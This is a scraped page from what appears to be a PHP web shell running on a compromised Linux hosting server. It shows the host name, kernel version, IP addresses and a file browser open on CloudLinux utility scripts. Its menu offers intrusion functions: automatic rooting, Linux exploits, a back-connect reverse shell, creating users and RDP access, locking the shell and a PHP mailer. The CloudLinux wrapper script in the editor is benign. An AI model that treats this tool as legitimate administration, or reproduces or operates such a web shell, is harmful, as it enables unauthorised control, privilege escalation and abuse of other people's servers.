Linux salto.nuvemidc.com 5.14.0-687.42.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Aug 27 11:55:12 EDT 2026 x86_64
LiteSpeed
: 177.73.233.61 | : 216.73.217.116
Cant Read [ /etc/named.conf ]
7.4.33
agenci18
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
l.v.e-manager /
utils /
[ HOME SHELL ]
Name
Size
Permission
Action
activate
2.3
KB
-rwxr-xr-x
cloudlinux-cli-user.py
491
B
-rwxr-xr-x
cloudlinux-selector.py
654
B
-rwxr-xr-x
cloudlinux_cli_user.py
19.98
KB
-rw-r--r--
cpanel_api.py
11.39
KB
-rw-r--r--
libcloudlinux.py
38.66
KB
-rw-r--r--
node_wrapper
272
B
-rwxr-xr-x
npm_wrapper
1.69
KB
-rwxr-xr-x
python_wrapper
572
B
-rwxr-xr-x
set_env_vars.py
4.57
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : python_wrapper
#!/usr/bin/bash # # Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2021 All Rights Reserved # # Licensed under CLOUD LINUX LICENSE AGREEMENT # http://cloudlinux.com/docs/LICENCE.TXT # if [[ $EUID -eq 0 ]]; then echo "This program is not intended to be run as root." 1>&2 exit 1 fi CWD=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd) source ${CWD}/activate CL_PYTHON_VERSION="$(echo "${VIRTUAL_ENV}" | awk -F '/' '{print $NF}')" eval $(${CWD}/set_env_vars.py python) ABSOLUTE_PATH="${CWD}/python${CL_PYTHON_VERSION}_bin" exec "${ABSOLUTE_PATH}" "$@"
Close